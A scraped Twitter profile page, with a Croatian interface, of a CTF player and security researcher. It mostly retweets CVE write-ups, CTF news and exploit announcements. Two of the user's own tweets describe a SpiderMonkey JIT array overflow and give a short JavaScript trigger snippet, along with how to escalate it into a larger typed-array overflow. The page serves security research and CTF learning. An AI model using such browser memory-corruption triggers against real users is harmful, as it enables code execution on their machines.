Vignesh S Rao

@sherl0ck__

Cyber Security Enthusiast | CTFer | Pwning | Forensics

Vrijeme pridruživanja: prosinac 2017.

Tweetovi

Blokirali ste korisnika/cu @sherl0ck__

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sherl0ck__

  1. Prikvačeni tweet
    19. kol 2019.
    Poništi
  2. proslijedio/la je Tweet
    prije 17 sati

    just found that this writeup for CVE-2019-9793, a range analysis bug in Spidermonkey found by and analyzed by me is now unrestricted: I thought it was a cool bug, although unfortunately Spectre mitigations prevented exploitation as far as I know

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    4. velj

    2019 was a great year for Exodus and 2020 is going to be even better. We're expecting to expand the team on a variety of fronts. If interested visit and email careers@exodusintel.com with a cv and references published work

    Poništi
  4. proslijedio/la je Tweet
    24. sij

    🎉 it's Chinese New Year's Eve! so we're going to release some new challenges! 8 new challenges will be unlocked on UTC 2019-01-26 04:00

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    22. sij

    Our member found yet another bug in QEMU's network backend and was asssigned with CVE-2020-7039. For more info, checkout:

    Poništi
  6. proslijedio/la je Tweet
    4. sij

    Introducing MemLabs - Educational, CTF-styled labs for individuals interested in Memory Forensics, is now released. Link: Author:

    Poništi
  7. proslijedio/la je Tweet
    6. pro 2019.

    Here is an exploit chain I wrote for Firefox that gets RCE via CVE-2019-9810 and escape the sandbox with CVE-2019-11708/CVE-2019-9810. Once compromised, it drops a payload and injects privileged JS code in already/newly created tabs.

    Poništi
  8. proslijedio/la je Tweet
    30. stu 2019.

    Don't miss the episode later today at 17:00 UTC: . We have a great competitor line-up consisting of: peace-maker, NotDeGhost, and Who will be the first one to solve today's tricky pwnable challenge?

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    27. stu 2019.

    Solving binary-only CTF challenges with honggfuzz and qemu binary instrumentation -

    Poništi
  10. proslijedio/la je Tweet
    21. stu 2019.

    Blog post on CVE-2019-2215, the Android binder bug that was exploited in-the-wild and affected most Android devices manufactured prior to Fall 2018.

    Poništi
  11. proslijedio/la je Tweet
    27. lis 2019.

    I just upgraded to Ubuntu 19.10 and noticed that they enable -fcf-protection by default in gcc which adds an endbr64 instruction in every function prologue. This seems strange for two reasons:

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    27. lis 2019.

    Today is the 3rd anniversary of "Attacking JavaScript Engines". Not a lot has changed, but I tried to briefly summarize the things that did: It's been a few month since my last interactions with JSC though, so any corrections/additions are very welcome :)

    Poništi
  13. proslijedio/la je Tweet
    27. lis 2019.

    Our members & did a small research in which they created a fuzzing tool that found new functions to bypass PHP disable_functions & can also tell how strong your disable_functions is. Full report: Tool:

    Poništi
  14. proslijedio/la je Tweet
    24. lis 2019.

    Of course we also had a bunch of local teams playing. While attending the conference they achieved some quite competitive results. Our local winners are: 1. 2. 3. Great job! See you at the award ceremony at 5:00pm

    Poništi
  15. proslijedio/la je Tweet
    14. lis 2019.

    Uploaded all my challenges for HITCON CTF Quals 2019! Include the src/sol of funny misc chals, a RE challenge written in Crystal, and the hardest challenges, PoE, that needs you to exploit the user-space program, the Linux kernel module, and hack QEMU!

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    13. lis 2019.

    My exploit for my challenges at HITCON CTF 2019 Qual Hope everyone can learn more from our CTF.

    Poništi
  17. proslijedio/la je Tweet
    8. lis 2019.
    Poništi
  18. proslijedio/la je Tweet

    Finally finished the navarint challenge at , written by !! It has eluded solves from not one, but two competitions now! Kinda sad 😰 for problem writer... Here's my exploit file for the challenge:

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    29. ruj 2019.

    HACKED! Verbose booting iPhone X looks pretty cool. Starting in DFU Mode, it took 2 seconds to jailbreak it with checkm8, and then I made it automatically boot from NAND with patches for verbose boot. Latest iOS 13.1.1, and no need to upload any images. Thanks

    Prikaži ovu nit
    Poništi
  20. 22. ruj 2019.

    Simple 2 element overflow in Array, as initialized length is compared with (initialized length + 2) when jit'ed. Use this to overwrite the shape and group for the following object (say a Uint8Array) to that of Uint32Array, thus attaining a larger overflow in a typed array.

    Prikaži ovu nit
    Poništi
  21. 22. ruj 2019.

    blah = new Array() blah.push(new Array(1.1,1.1)) blah.push(new Uint32Array(0x10)) function trigger(a1,a2){ blah[0][a1]=1.337; for (let i=0; i<100000; i++){} } for(var i=0;i<100;i++) trigger(0) trigger(2) blah[1]

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·